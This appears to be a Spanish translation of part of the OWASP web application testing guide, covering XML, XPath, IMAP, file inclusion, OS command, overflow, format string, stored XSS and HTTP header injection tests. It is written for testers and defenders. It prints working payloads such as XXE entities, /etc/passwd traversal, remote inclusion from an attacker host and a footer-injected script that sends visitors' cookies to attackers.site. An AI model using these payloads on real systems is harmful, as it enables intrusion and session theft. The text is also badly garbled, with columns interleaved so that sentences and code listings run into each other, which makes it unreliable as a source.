• NHibernate http://nhforge.org/
Cómo probar
Resumen
La prueba de inyección XML se da cuando un evaluador intenta inyectar Cuando un usuario llena un formulario HTML para registrarse, la aplicación
un documento XML a la aplicación. Si el analizador XML falla en la recibe los datos del usuario en una petición estándar, que, por simplicidad, se
validación de datos dentro de su contexto, la prueba dará un resultado supone será enviada en una petición GET.
positivo.
Cómo probar
producirán la solicitud:
Supongamos que hay una aplicación web que utiliza una comunicación de
estilo XML para llevar a cabo el registro del usuario. Esto se hace creando
http://www.example.com/addUser.php?username=tony&password=U
y añadiendo un nuevo nodo de <user> en un archivo xmlDb.
n6R34kb!e&email=s4tan@hell.com
<users>
<user>
<user>
<username>tony</username>
<username>gandalf</username>
<password>Un6R34kb!e</password>
<password>!c3</password>
<userid>500</userid>
<userid>0</userid>
<mail>s4tan@hell.com</mail>
<mail>gandalf@middleearth.com</mail>
</user>
</user>
<user>
que será añadido al xmlDB:
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>gandalf</username>
<userid>0</userid>
inputValue = foo’
<mail>gandalf@middleearth.com</mail>
</user>
<user>
se crea una instancia y luego se inserta como el valor de attrib:
<username>Stefan0</username>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
Entonces, el documento XML resultante no está redactado correctamente.
<user>
<username>tony</username>
• Comilla Doble (Double quote): “ - este carácter tiene el mismo significado
que la comilla simple y puede utilizarse si el valor del atributo está encerrado
<password>Un6R34kb!e</password>
entre comillas dobles.
<userid>500</userid>
<node attrib=”$inputValue”/>
Descubrimiento
El primer paso para probar una aplicación en busca de una vulnerabilidad de Así que:
inyección XML consiste en intentar insertar metacaracteres XML.
$inputValue = foo”
la sustitución da:
<mail>s4tan@hell.com</mail>
</user>
<username>foo<</username>
<mail>s4tan@hell.com</mail>
<tagnode><</tagnode>
<username>&foo</username>
<password>Un6R34kb!e</password>
<mail>s4tan@hell.com</mail>
<username><![CDATA[]]>]]></username>
</user>
<node>
<html>
<![CDATA[<foo>]]>
$HTMLCode
</node>
</html>
así ‘<foo>’ no será analizado como una marca y será considerado como un
carácter de datos. Entonces el atacante puede proporcionar el siguiente ingreso:
$HTMLCode =
Si el nodo se construye de la siguiente manera: <![CDATA[<]]>script<![CDATA[>]]>alert(‘xss’)<![CDATA[<]]>/scr
ipt<![CDATA[>]]>
<username><![CDATA[<$userName]]></username>
El evaluador puede intentar inyectar una cadena de cierre CDATA ‘]]>’ para
tratar de invalidar el documento XML.
</html>
Otras pruebas útiles son las siguientes:
<!DOCTYPE foo [
Durante el proceso, la sección de delimitadores CDATA es eliminada
generando el siguiente código HTML: <!ELEMENT foo ANY >
<!DOCTYPE foo [
El resultado es que la aplicación es vulnerable al XSS.
<!ELEMENT foo ANY >
Para probar las vulnerabilidades XXE, uno puede utilizar el siguiente <!DOCTYPE foo [
ingreso:
<!ELEMENT foo ANY >
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM “file:///dev/random” Una vez que se logra el primer paso, el evaluador tendrá alguna
>]><foo>&xxe;</foo> información sobre la estructura del documento XML. Entonces, es posible
intentar inyectar datos XML y etiquetas. Mostraremos un ejemplo de
cómo esto puede llevar a un ataque de escalada de privilegios.
la aplicación construirá un nuevo nodo y anexo a la base de datos XML. <!DOCTYPE users [
</user>
<user>
<username>Stefan0</username>
Tome en cuenta que el nodo de nombre de usuario se define con la
<password>w1s3c</password> cardinalidad 1. En este caso, el ataque que hemos mostrado antes (y otros
ataques simples) no funcionarán si el documento XML se valida contra su
<userid>500</userid> DTD antes de que ocurra cualquier procesamiento.
<mail>Stefan0@whysec.hmm</mail>
</user> Sin embargo, este problema puede ser resuelto si el evaluador controla el
valor de algunos nodos anteriores el nodo ofensivo (el identificador de
<user> usuario, en este ejemplo). De hecho, el evaluador puede comentar en
dichos nodos, mediante la inyección de una secuencia de inicio y fin de
<username>tony</username> comentario:
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail><userid>0</userid><mail>s
Username: tony
Se comentó en el nodo de nombre de usuario original, dejando sólo el que
Password: Un6R34kb!e</password><!--
fue inyectado. Ahora, el documento cumple con las reglas de su DTD.
E-mail: --><userid>0</userid><mail>s4tan@hell.com
Herramientas
https://wfuzz.googlecode.com/svn/trunk/wordlist/Injections/XML.txt
En este caso la base de datos XML final es:
<mail>gandalf@middleearth.com</mail>
Pruebas de inyección de SSI (OTG-INPVAL-009)
</user>
Resumen
<user>
Los servidores web suelen dar a los desarrolladores la posibilidad de
<username>Stefan0</username> añadir pequeñas piezas de código dinámico dentro de páginas HTML
estáticas, sin tener que lidiar con todos los derechos de los lenguajes del
<password>w1s3c</password> servidor o del cliente. Esta característica es encarnada cuando el servidor
incluye (SSI). En la prueba de inyección SSI, probamos si es posible
<userid>500</userid> inyectar en los datos de la aplicación que serán interpretados por
mecanismos del SSI. Una explotación exitosa de esta vulnerabilidad
<mail>Stefan0@whysec.hmm</mail>
permite a un atacante inyectar código en páginas HTML o incluso realizar
ejecución remota de códigos.
</user>
<user>
Server-Side Includes son directivas que el servidor web analiza antes de
<username>tony</username>
servir la página al usuario. Representan una alternativa para escribir
programas CGI o incrustar código utilizando lenguajes de scripting del
<password>Un6R34kb!e</password><!--
</password> lado del servidor, cuando sólo hay que realizar tareas muy simples. Las
implementaciones comunes de SSI proporcionan comandos para incluir
<userid>500</userid> archivos externos, configurar e imprimir las variables del entorno CGI del
servidor web y ejecutar scripts CGI externos o comandos del sistema.
<mail>--
><userid>0</userid><mail>s4tan@hell.com</mail>
</user> Poner una directiva SSI en un documento HTML estático es tan fácil como
escribir un pedazo de código como el siguiente:
Esto es similar a las pruebas de vulnerabilidad XSS utilizando Al dar estos pasos se trata, más que nada, de utilizar grep para encontrar
las palabras clave correctas dentro del código fuente (directivas SSI,
variables del entorno CGI, asignación de variables que implican ingreso
de datos del usuario, las funciones de filtro y demás).
<script>alert(“XSS”)</script>
Herramientas
Libros Blancos
GET / HTTP/1.0
• Apache Tutorial: “Introduction to Server Side Includes”: apache.org
Resumen
<?xml version=”1.0” encoding=”ISO-8859-1”?>
XPath es un lenguaje que ha sido diseñado y desarrollado, sobre todo,
<users>
para dirigirse a las piezas de un documento XML. En la prueba de
inyección XPath, probamos si es posible inyectar la sintaxis de XPath en
<user>
una solicitud interpretada por la aplicación, permitiendo a un atacante
ejecutar consultas XPath controladas por el usuario. Cuando se explota
<username>gandalf</username>
con éxito, esta vulnerabilidad podría permitir a un atacante eludir
mecanismos de autenticación o información sin la debida autorización. <password>!c3</password>
<account>admin</account>
<account>guest</account>
Tal como las bases de datos relacionales se acceden a través del lenguaje
SQL, las bases de datos XML utilizan XPath como su lenguaje de consulta </user>
estándar.
<user>
<username>tony</username>
Ya que, desde un punto de vista conceptual, XPath es muy similar a SQL
en sus propósitos y usos, un resultado interesante es que los ataques de <password>Un6R34kb!e</password>
inyección XPath siguen la misma lógica que los ataques de inyección SQL.
En algunos aspectos, XPath es incluso más poderoso que el SQL estándar,
ya que todo su poder está ya presente en sus especificaciones, mientras
que un gran número de técnicas que pueden utilizarse en un ataque de
inyección SQL depende de las características del dialecto SQL usado por Una consulta XPath que devuelve la cuenta cuyo username es "gandalf" y la
la base de datos de destino. contraseña es "! c3" sería la siguiente:
string(//user[username/text()=’gandalf’ and
Esto significa que los ataques de inyección XPath pueden ser mucho más password/text()=’!c3’]/account/text())
adaptables y ubicuos. Otra de las ventajas de un ataque de inyección
XPath es que, a diferencia del SQL, no se aplica ningún ACL ya que nuestra
consulta puede acceder a todas las partes del documento XML.
Se ve bastante familiar, ¿no? Utilizando estos parámetros, la consulta se La técnica de inyección IMAP/SMTP es más eficaz si el servidor de correo
convierte en: no es directamente accesible desde el Internet. Donde una comunicación
completa con el servidor de correo de acceso restringido sea posible, se
recomienda realizar pruebas directas.
string(//user[username/text()=’’ or ‘1’ = ‘1’ and password/text()=’’ or
‘1’ = ‘1’]/account/text())
Referencias
Libros Blancos
Resumen
Esta amenaza afecta a todas las aplicaciones que se comunican con La figura 1 muestra el flujo de tráfico visto generalmente al utilizar
servidores de correo (IMAP/SMTP), generalmente aplicaciones de tecnologías de webmail. Los pasos 1 y 2 son el usuario interactuando con el
webmail. El objetivo de esta prueba es verificar la capacidad de inyectar cliente de correo web, mientras que el paso 3 es el evaluador evadiendo al
comandos IMAP/SMTP arbitrarios en los servidores de correo, debido a cliente webmail e interactuando directamente con los servidores de correo de
que el ingreso de datos no está correctamente desinfectado. acceso restringido (back-end).
• Fugas de información
• Relevo/SPAM
Los parámetros especiales de IMAP que se deben utilizar son: • Añada caracteres especiales no éstandar (i.e.: \, ‘, “, @, #, !, |):
http://<webmail>/src/read_body.php?mailbox=INBOX”&passed_id=4
http://<webmail>/src/view_header.php?mailbox=INBOX%22&passed
6106&startMessage=1
_id=46105&passed_ent_id=0
• Elimine el parámetro:
S1 - La aplicación devuelve un código/mensaje de error. La situación S2 es más difícil de probar con éxito. El probador debe usar
inyección ciega de comandos para determinar si el servidor es vulnerable.
S2 - La aplicación no devuelve un código/mensaje de error, pero no
realiza la operación solicitada.
S3 - La aplicación no devuelve un código/mensaje de error, y realiza la Por otro lado, la última situación (S3) no es relevante en esta sección.
operación solicitada normalmente.
Resultado esperado:
Las situaciones S1 y S2 representan una inyección IMAP/SMTP exitosa.
http://<webmail>/src/read_body.php?mailbox=INBOX&passed_id=46
225&startMessage=1
Al utilizar el siguiente caso de prueba (cuando proporciona un valor alfabético Una vez que el evaluador ha identificado los parámetros vulnerables y ha
y se requiere un valor numérico): analizado el contexto en el que se ejecutan, la siguiente etapa es explotar
la funcionalidad.
http://<webmail>/src/read_body.php?mailbox=INBOX&passed_id=te
st&startMessage=1
Esta etapa tiene dos posibles resultados:
ERROR : Bad or malformed request. [2] La inyección sólo es posible en un estado autenticado: la explotación
exitosa requiere que el usuario esté plenamente autenticado antes de que
Query: FETCH test:test BODY[HEADER] la prueba pueda continuar.
En otras situaciones, el mensaje de error ( "not controlled", no controlado • Cuerpo: inyección del nuevo comando;
por la aplicación) contiene el nombre del comando ejecutado, pero leer el
RFC adecuado (vea la sección de "Referencia") le permitirá al evaluador • Pie: inicio del comando esperado.
entender qué otros comandos pueden ser ejecutados.
Resultado esperado:
http://www.webappsec.org/projects/articles/121106.pdf
FETCH 4791 BODY[HEADER]
Resumen
En este escenario, la estructura de inyección IMAP sería:
Esta sección describe cómo un evaluador puede comprobar si es posible
introducir código en una página web y ejecutarlo con el servidor web.
http://<webmail>/read_email.php?message_id=4791
BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101
FETCH 4791
En la prueba de inyección de código, un evaluador envía información que
es procesada por el servidor web como código dinámico o como un
archivo incluido. Estas pruebas pueden dirigirse a varios motores de
secuencias de scripting del servidor, como ASP o PHP. Una correcta
validación de la entrada y prácticas de codificación seguras deben
Lo que generaría los siguientes comandos: emplearse para protegerse de estos ataques.
Resultado esperado:
Referencias
• RFC 3501 “http://www.ietf.org/rfc/rfc3501.txt”. Examine el código ASP en busca de información ingresada por el usuario
en funciones de ejecución. ¿ El usuario puede ingresar los comandos en el
• Vicente Aguilera Díaz: “MX Injection: Capturing and Exploiting Hidden Mail campo de entrada de datos? Aquí, el código ASP almacena la información
Servers” - en un archivo y luego lo ejecuta:
<%
Pruebas para determinar la inclusión de documentos locales
If not isEmpty(Request( “Data” ) ) Then
Resumen
Dim fso, f
La vulnerabilidad de inclusión de documentos permite al atacante incluir un
‘User input Data is written to a file named data.txt documento, normalmente explotando un mecanismo de “inclusión de
documento dinámica” implementado en la aplicación objetivo. La
Set fso = CreateObject(“Scripting.FileSystemObject”)
vulnerabilidad ocurre debido al uso de datos ingresados por el usuario sin una
apropiada validación.
Set f = fso.OpenTextFile(Server.MapPath( “data.txt” ), 8, True)
Else
%>)))
Cómo probar
• Insecure.org - http://www.insecure.org
Considere el siguiente ejemplo:
• Wikipedia - http://www.wikipedia.org
http://vulnerable_host/preview.php?file=example.html http://vulnerable_host/preview.php?file=../../../../etc/passwd%00
Este caso parece el lugar perfecto para buscar LFI. Si un atacante tiene Referencias
suficiente suerte, y en vez de seleccionar la página apropiada de la matriz
por su nombre, la secuencia de comandos incluye directamente el • Wikipedia - http://www.wikipedia.org/wiki/Local_File_Inclusion
parámetro de entrada, es posible incluir archivos arbitrarios en el
servidor. • Hakipedia - http://hakipedia.com/index.php/Local_File_Inclusion
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
Pruebas para la inclusión remota de archivos
alex:x:500:500:alex:/home/alex:/bin/bash
Resumen
margo:x:501:501::/home/margo:/bin/bash
La vulnerabilidad de inclusión de archivos permite que un atacante
incluya un archivo, generalmente, aprovechando un mecanismo de
...
"inclusión dinámica de archivos" implementado en la aplicación de
Muy a menudo, incluso cuando existe dicha vulnerabilidad, su explotación es un destino. La vulnerabilidad se produce debido al uso de datos
poco más compleja. Considere el siguiente fragmento del código: suministrados por el usuario sin una validación adecuada.
En el caso de la sustitución simple con nombres de archivo arbitrarios no • Ejecución de código en el servidor web.
funcionaría, ya que se añade el sufijo 'php'. Para evitarlo, se utiliza una técnica con
terminadores null bytes. Cómo %00 representa efectivamente el final de la cadena, • Ejecución de código en el lado del cliente como JavaScript que nos llevaría a
se ignorará cualquier carácter después de este byte especial. La siguiente solicitud otros ataques tales como cross site scripting (XSS).
también devolverá una lista de atacante de los atributos básicos de los usuarios:
• Negación de servicio (DoS).
Remediación
La inclusión remota de archivos (también conocida como RFI) es el La solución más eficaz para eliminar las vulnerabilidades de inclusión de
proceso de incluir archivos remotos a través de la explotación de las archivo es evitar pasar datos enviados por el usuario a cualquier
vulnerabilidades en los procedimientos de inserción implementados en la filesystem/framework API. Si esto no es posible, la aplicación puede
aplicación. Esta vulnerabilidad se produce, por ejemplo, cuando una mantener una lista blanca de archivos que pueden ser incluidos por la
página recibecomo datos, la ruta del archivo que debe estar incluida y página y luego utilizar un identificador (por ejemplo, el número de índice)
este dato no ha sido correctamente desinfectado, permitiendo que una para tener acceso al archivo seleccionado. Cualquier solicitud que
URL externa se inyecte. Aunque la mayoría de ejemplos apuntan a scripts contenga un identificador inválido será rechazada, de esta manera no hay
PHP vulnerables, debemos tener en cuenta que también es común en ninguna superficie de ataque para que usuarios malintencionados puedan
tecnologías como JSP, ASP y otras. manipular la ruta.
Puesto que la RFI ocurre cuando las rutas para "incluir" declaraciones no están Resumen
correctamente desinfectadas, en un enfoque de pruebas de Caja Negra debemos
buscar scripts que tomen los nombres de archivos como parámetros. Considere el Este artículo describe cómo probar una aplicación en busca de inyección de
siguiente ejemplo PHP: comandos del sistema operativo. El evaluador intentará inyectar un comando de
sistema operativo a través de una solicitud HTTP a la aplicación.
include($incfile.”.php”); La Inyección de comandos del sistema operativo es una técnica utilizada a través de
una interfaz web para ejecutar comandos del sistema operativo en un servidor web.
El usuario provee comandos del sistema operativo a través de una interfaz web para
ejecutar comandos del sistema operativo. Cualquier interfaz que no esté
correctamente desinfectada está sujeta a esta debilidad. Con la habilidad de ejecutar
En este ejemplo la ruta de acceso se extrae de la solicitud HTTP y no se comandos en el sistema operativo, el usuario puede subir programas maliciosos o
realiza una validación de datos ingresados (por ejemplo, comprobando el incluso obtener contraseñas. La inyección de comandos del sistema operativo es
ingreso contra una lista blanca), así que este fragmento de código resulta prevenible cuando la seguridad se acentúa durante el diseño y desarrollo de las
vulnerable a este tipo de ataque. Considere de hecho la siguiente URL: aplicaciones.
Cómo probar
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicou
s_page Al observar un archivo en una aplicación web, el nombre del archivo a menudo se
muestra en la URL. Perl permite canalizar datos de un proceso hacia una
instrucción abierta. El usuario simplemente puede añadir el símbolo Pipe "|" en el
final del nombre del archivo.
En este caso el archivo remoto va a ser incluido y cualquier código que contenga se
ejecutara en el servidor. Ejemplo de las URL antes de ser alteradas:
http://sensitive/cgi-bin/userData.pl?doc=user1.txt
Referencias
Libros Blancos
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Ejemplo:
Accept-Encoding: gzip,deflate
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Consideremos el caso de una aplicación que contiene un conjunto de documentos Referer: http://127.0.0.1/WebGoat/attack?Screen=20
que pueden navegarse en Internet. Si usted enciende WebScarab, puede obtener un
HTTP POST como el siguiente: Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8
,image/png,*/*;q=0.5 Si la aplicación no validase la solicitud, podemos obtener el siguiente resultado:
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/WebGoat/attack?Screen=20
Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
Content-Type: application/x-www-form-urlencoded
Content-length: 33
Directory of c:\
Remediación
18/10/2006 00:27 2,675 Dir_Prog.txt
Desinfección
18/10/2006 00:28 3,887 Dir_ProgFile.txt
Los formularios de datos y la URL deben desinfectarse de caracteres no
16/11/2006 10:43
válidos. Una "lista negra" de caracteres es una opción, pero puede ser
Doc difícil pensar en todos los caracteres contra los que hay que validar.
También pueden haber algunos que no han sido descubiertos todavía.
11/11/2006 17:25 Para validar la entrada del usuario se debe crear una "lista blanca" que
contenga sólo caracteres permitidos. Caracteres que faltaron, así como las
Documents and Settings amenazas desconocidas, deben ser eliminados de esta lista.
25/10/2006 03:11
I386
Permisos
14/11/2006 18:51
La aplicación web y sus componentes deben ejecutarse bajo permisos
h4ck3r estrictos que no permitan la ejecución de comandos del sistema
operativo. Trate de verificar todas estas informaciones para probar desde
30/09/2005 21:40 25,934 un punto de vista de Caja Gris.
OWASP1.JPG
Prog
Resumen
18/11/2006 11:20
Para conocer más acerca de las vulnerabilidades de saturación de búfer,
Program Files consulte las páginas de saturación de búfer.
16/11/2006 21:12
24/10/2006 18:25
Cómo probar
En este caso, hemos realizado con éxito un ataque de inyección de OS.
Diferentes tipos de vulnerabilidades de saturación de búfer tienen
diferentes métodos de prueba. Aquí están los métodos de prueba para los
tipos comunes de vulnerabilidades de saturación de búfer.
Herramientas
• OWASP ZAP
• Pruebas de vulnerabilidad de saturación del heap. con la saturación de pilas de datos, ya que hay ciertas condiciones que
deben existir en el código de estas vulnerabilidades para que sean
• Pruebas de vulnerabilidad de saturación de pilas de datos. explotables.
Cómo probar
Vea el artículo de la Guía de revisión de código OWASP sobre cómo Los principios de las pruebas de Caja Negra para saturación de heap son
revisar el código en busca de vulnerabilidades por saturación de heap o los mismos que se utilizan para la saturación de pilas de datos. La clave
búfer. está en introducir cadenas de entrada que sean más largas de lo esperado.
Aunque el proceso de prueba sigue siendo el mismo, los resultados que
son visibles en el depurador son significativamente diferentes. Mientras
que, en el caso de una saturación de pila de datos, una instrucción de
puntero o sobreescritura SEH sería evidente; esto no sucede en una
condición de saturación de heap.
Remediación
vulnerable(argv[1]);
Pruebas de Caja Gris
return 0;
Al revisar el código, uno debe darse cuenta que hay varias vías por donde
}
las vulnerabilidades asociadas con los heaps pueden surgir. Un código
aparentemente inofensivo a primera vista puede ser vulnerable bajo
ciertas condiciones. Puesto que hay distintas variaciones de esta
vulnerabilidad, cubriremos sólo los temas que son predominantes.
La mayoría de las veces, los bufers heap son considerados seguros por {
muchos desarrolladores que no dudan en realizar operaciones inseguras
como strcpy () en ellos. El mito de que una saturación de pila de datos y la
instrucción de sobrescribir el puntero son los únicos medios para
HANDLE hp = HeapCreate(0, 0, 0);
ejecutar un código arbitrario resulta peligroso en caso del código que se
muestra a continuación:
En este caso, si buf excede los 260 bytes, se sobreescriben los punteros a
la etiqueta de límite adyacente, facilitando la sobrescritura de una
ubicación de memoria arbitraria con cuatro bytes de datos una vez que
comienza la rutina heap de almacenamiento dinámico.
free(string);
Probar la saturación de pila de datos
return -1;
Resumen
}
La saturación de pila de datos se produce cuando se copian datos de
El malloc en la línea 1 asigna memoria basada en el valor de la longitud, el
tamaño variable en búferes de longitud ubicados en la pila de datos del
cual coincide con un entero de 32 bits. En este ejemplo particular, la
programa sin ninguna comprobación de los límites.
longitud es controlable por el usuario y se puede fabricar un archivo
TNEF malicioso para ajustar la longitud a '-1', que daría como resultado
malloc (0). Por lo tanto, este malloc asignaría un búfer heap pequeño, que
sería de 16 bytes en la mayoría de las plataformas de 32 bits (como se Las vulnerabilidades de esta clase se consideran generalmente de alta
indica en malloc.h). severidad, ya que su explotación permitiría, sobre todo, la ejecución de
código arbitrario o negación de servicio. Aunque rara vez se encuentra en
plataformas interpretadas, el código escrito en C y lenguajes similares es,
a menudo, montado con instancias de esta vulnerabilidad. De hecho, casi
Y ahora, en la línea 2, una saturación de heap se produce en la llamada a
todas las plataformas son vulnerables a saturación de pila de datos con
fread (). El tercer argumento, en este caso la longitud, se espera que sea
las siguientes excepciones notables:
una variable de size_t. Pero si va a ser '-1', el argumento envuelve a
0xFFFFFFFF, copiando así 0xFFFFFFFF bytes en el búfer de 16 bytes.
#include<stdio.h>
char buff[20];
strcpy(buff,argv[1]);
return 0;
aplicación, el cual es un proceso complejo y tedioso y utiliza técnicas de El uso, relativamente más seguro, de strncpy()también puede llevar a una
difuminación (fuzzing). saturación de cúmulo de datos, ya que sólo restringe el número de bytes
copiados en el búfer de destino. Si el argumento de tamaño que se utiliza para
lograr esto se genera dinámicamente basado en los datos ingresados por el
usuario o no se calcula exactamente dentro de la trayectoria, es posible la
Pruebas de Caja Gris saturación de búferes de cúmulo de datos. Por ejemplo:
…
void log_create(int severity, char *inpt) {
size=strlen(source)+1
char b[1024];
….
strncpy(dest,source,size)
}
if (severity == 1)
Donde la fuente son datos controlables por el usuario. Un buen ejemplo seria
{ la vulnerabilidad de saturación de pila de datos samba trans2open.
(http://www.securityfocus.com/archive/1/317615).
strcat(b,”Error occurred on”);
strcat(b,”:”);
Las vulnerabilidades también pueden aparecer en la URL y desde el código de
strcat(b,inpt); análisis de dirección. En tales casos, una función como memccpy() es
generalmente empleada, ya que copia los datos en un búfer de destino desde la
fuente mientras no se encuentre un carácter especificado. Considere la
función:
memccpy(servaddr,path,’\’);
….
De lo anterior, la línea strcat(b,inpt) dará lugar a una saturación de cúmulo de
datos si inpt excede los 1024 bytes. Esto no sólo demuestra el uso inseguro de
strcat, también muestra lo importante que es examinar la longitud de las
secuencias a las que hace referencia un puntero de carácter que se pasa como
argumento a una función, en este caso, la longitud de cadena referenciada por
char *inpt. Por lo tanto, siempre es una buena idea rastrear la fuente de los En este caso, la información contenida en la ruta de acceso podría ser
argumentos de la función y determinar longitudes de cadena al revisar el mayor a 40 bytes antes de que '\' pueda encontrarse. Si esto ocurre , se
código. provocará una saturación de pila de datos.
Una vulnerabilidad similar se encuentra en el subsistema de Windows Esta sección describe cómo probar ataques de cadena de formato que
RPCSS (MS03-026). El código vulnerable copió los nombres de rutas de pueden utilizarse para bloquear un programa o ejecutar un código
acceso UNC del servidor en un búfer de tamaño fijo, hasta que un '\' fue dañino. El problema surge por la utilización de datos ingresados por el
encontrado. La longitud del nombre del servidor, en este caso, era usuario, que no han sido filtrados, como el parámetro de formato de
controlable por los usuarios. cadena en ciertas funciones C que realizan el formateo, como printf().
Aparte de revisar manualmente el código de saturación de pila de datos, Varios lenguajes de estilo C disponen de un formato de salida por medio
también pueden ser de gran ayuda las herramientas de análisis estático de funciones como printf (), fprintf () etc..
del código. Aunque tienden a generar muchos falsos positivos y apenas
serían capaces de localizar una pequeña porción de defectos, sin duda El formateo se rige a un parámetro de estas funciones como un
ayudan a reducir la sobrecarga asociada con la búsquedas sencillas, como especificador del tipo de formato, normalmente %s, %c etc.. La
los bugs strcpy() y sprintf(). vulnerabilidad se presenta cuando se contactan funciones de formato que
tienen una inadecuada validación de parámetros y datos controlados por
el usuario.
• Aleph One: “Smashing the Stack for Fun and Profit”: insecure.org
http://hostname/cgi-bin/query.cgi?name=john%x.%x.%x&code=45765%x.%x
Libros Blancos
thenewsh.com
julianor.tripod.com
vfprintf
• En primer lugar, el vector de ataque debe ser constante y debe almacenarse
vprintf en la capa de persistencia. Esto ocurrirá únicamente si una validación de
datos débil está presente o los datos llegaron al sistema a través de otro canal
vsprintf como una consola de administración o directamente a través de un proceso de
datos restringidos.
vsnprintf
• Segundo, una vez que el vector de ataque ha sido "contactado", este necesita
Puede haber varias funciones de formateo que son específicas en la ejecutarse de una manera satisfactoria. Por ejemplo, un ataque XSS incubado
plataforma de desarrollo. Esto también debe revisarse en busca de la requiere una validación de salida de datos débil para que el script pueda ser
ausencia de cadenas de formato, una vez que se ha entendido su entregado al cliente de una manera ejecutable.
argumento de uso.
particular que encontró para construir un ataque basado en el lado del cliente; página resultante o descargue y ejecute el archivo desde el sitio de
este se utiliza generalmente para atacar a un gran número de víctimas al confianza.
mismo tiempo (es decir, a todos los usuarios que navegan por el sitio).
<script>document.write(‘<img
• Los componentes de carga de archivos en una aplicación web permiten al src=”http://attackers.site/cv.jpg?’+document.cookie+’”>’)</script>
atacante subir archivos corrompidos (imágenes jpg imágenes que explotan CVE-
2004-0200, imágenes png que explotan CVE-2004-0597, archivos ejecutables,
páginas de sitios con componentes activos, etc.).
[2] Dirija a los usuarios a navegar por la página vulnerable o espere a que
los usuarios naveguen. Tenga un "oyente" en el servidor anfitrión del sitio
del lado del atacante.para escuchar todas las conexiones entrantes.
• Asuntos de cross-site scripting de publicaciones en foros públicos (vea Pruebas
para Cross site scripting almacenados (OTG-INPVAL-002) para mayor detalle). [3] Cuando los usuarios navegan por la página vulnerable, una solicitud
Un atacante podría potencialmente almacenar secuencias de comandos que contiene su cookie (document.cookie se incluye como parte de la URL
malintencionados o el código en un repositorio en el servidor restringido de la solicitada) será enviada al servidor anfitrión del sitio del atacante, como
aplicación web (por ejemplo, una base de datos) para que este código de script los siguientes:
se ejecute mediante uno de los usuarios (los usuarios finales, administradores,
etc.). El ataque incubado arquetípico es ejemplificado por una vulnerabilidad de - GET
cross site scripting en un foro de usuarios, cartelera o blog para inyectar código /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE;
JavaScript en la página vulnerable y será eventualmente procesado y ejecutado
en el navegador del usuario del sitio utilizando el nivel de confianza del sitio %20JSESSIONID=ADIFFERENTVALUE:-
(vulnerable) original en el navegador del usuario. 1;%20ExpirePage=https://vulnerable.site/site/;
TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1
[1] De manera similar al anterior ejemplo de XSS, utilice un campo de Como también debería ser obvio, la habilidad de cambiar el contenido de
página web vulnerable a problemas de inyección SQL para cambiar un la página web en el servidor a través de cualquier vulnerabilidad que
valor en la base de datos que se utilizaría por la aplicación como ingresos puede ser explotable en el host dará al atacante permisos de escritura en
que se muestran en el sitio sin la filtración adecuada (esto sería una el webroot, y también será útil cuando se quiera plantar un ataque
combinación de una inyección de SQL y un problema XSS). incubado semejante en las páginas del servidor web (en realidad, se trata
de un método de propagación de la infección conocido para algunos
gusanos de servidores web).
Por ejemplo, supongamos que hay un pie de página en la base de datos Pruebas de Caja Gris
con todos los pies de página para las páginas del sitio web, incluyendo un
campo de nota con el aviso legal que aparece en la parte inferior de cada Las técnicas de pruebas gris/blancas serán las mismas que se discutieron
página web. Puede utilizar la siguiente consulta para inyectar código previamente.
JavaScript en el campo de avisos en el pie de página en la base de datos.
UPDATE footer
SET notice = ‘Copyright 1999-2030%20 • Para combatir el problema de la "puerta trasera" en ataques del lado del
cliente, la validación de salida debe ser empleada para que los datos
<script>document.write(\’<img contaminados sean codificados antes de mostrarlos al cliente y, por lo tanto,
src=”http://attackers.site/cv.jpg?\’+document.cookie+\’”>\’)</script>’ no se ejecuten.
[2] Ahora, cada usuario que navegue por el sitio enviará silenciosamente
sus cookies al sitio del atacante (pasos b.2 al b.4).
Herramientas
• XSS-proxy: sourceforge.net
Servidor mal configurado
• Paros: parosproxy.org
Algunos servidores web presentan una interfaz de administración que
• Burp Suite: portswigger.net
puede permitir a un atacante cargar componentes activos de su elección
en el sitio. Esto podría ser el caso con un servidor Apache Tomcat que no
• Metasploit: metasploit.com
obliga a utilizar credenciales fuertes para acceder a su gestor de
aplicaciones web (o si los evaluadores de edición han sido capaces de
obtener credenciales válidas para el módulo de administración por otros
medios). Referencias
• Blackboard Academic Suite 6.2.23 +/-: Persistent cross-site más sencillo es proporcionado por las redirecciones en las que la dirección
URL de destino depende de algún valor enviado por el usuario.
scripting vulnerability: archives.neohapsis.com
Esta sección ilustra ejemplos de ataques que aprovechan características Location: http://victim.com/main.jsp?interface=advanced
específicas del protocolo HTTP, ya sea mediante la explotación de las
debilidades de la aplicación web o peculiaridades, en la manera en que los <snip>
diferentes agentes interpretan los mensajes HTTP.
Al recibir este mensaje, el navegador llevará al usuario a la página
indicada en el encabezado de ubicación. Sin embargo, si la aplicación no
filtra la entrada de usuario, será posible introducir en el parámetro de la
Esta sección analizará dos diferentes ataques dirigidos a encabezados
'interfaz' la secuencia %0d%0a, que representa la secuencia CRLF que se
HTTP específicos:
utiliza para separar líneas.
Cómo probar
Location: http://victim.com/main.jsp?interface=advanced
Content-Length: 35
• Location
Como se mencionó en la introducción, el contrabando HTTP aprovecha POST /target.asp HTTP/1.0 <-- Request #3
las diferentes maneras en que un mensaje HTTP especialmente diseñado
puede ser analizado e interpretado por los diferentes agentes xxxx: POST /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 <--
